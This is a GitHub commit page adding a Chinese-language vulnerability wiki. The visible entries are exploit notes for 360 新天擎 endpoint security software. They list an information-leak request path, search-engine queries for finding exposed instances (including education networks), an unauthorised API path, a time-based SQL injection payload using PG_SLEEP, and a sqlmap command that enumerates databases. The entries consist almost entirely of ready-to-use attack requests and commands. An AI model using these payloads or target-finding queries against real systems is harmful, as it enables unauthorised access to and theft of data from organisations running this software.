Skip to content

Commit

Permalink
12.31上线wiki
Browse files Browse the repository at this point in the history
  • Loading branch information
wy876 committed Dec 31, 2023
0 parents commit 07ebe48
Show file tree
Hide file tree
Showing 237 changed files with 9,396 additions and 0 deletions.
Empty file added .nojekyll
Empty file.
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
## 360 新天擎终端安全管理系统存在信息泄露漏洞
```
GET /runtime/admin_log_confcache
```
26 changes: 26 additions & 0 deletions 360天擎_-_未授权与sql注入.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
## 360天擎 - 未授权与sql注入

## FOFA语法
```title="360新天擎"```


## 鹰图
```web.title="360新天擎"&& ip.isp="教育"```

## 漏洞复现

### 未授权漏洞
```路由后拼接/api/dbstat/gettablessize```
![](./assets/20231018183944.png)

### sql注入漏洞
比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入
```
路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
```
![](./assets/20231018184057.png)

## sqlmap
python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
Loading

0 comments on commit 07ebe48

Please sign in to comment.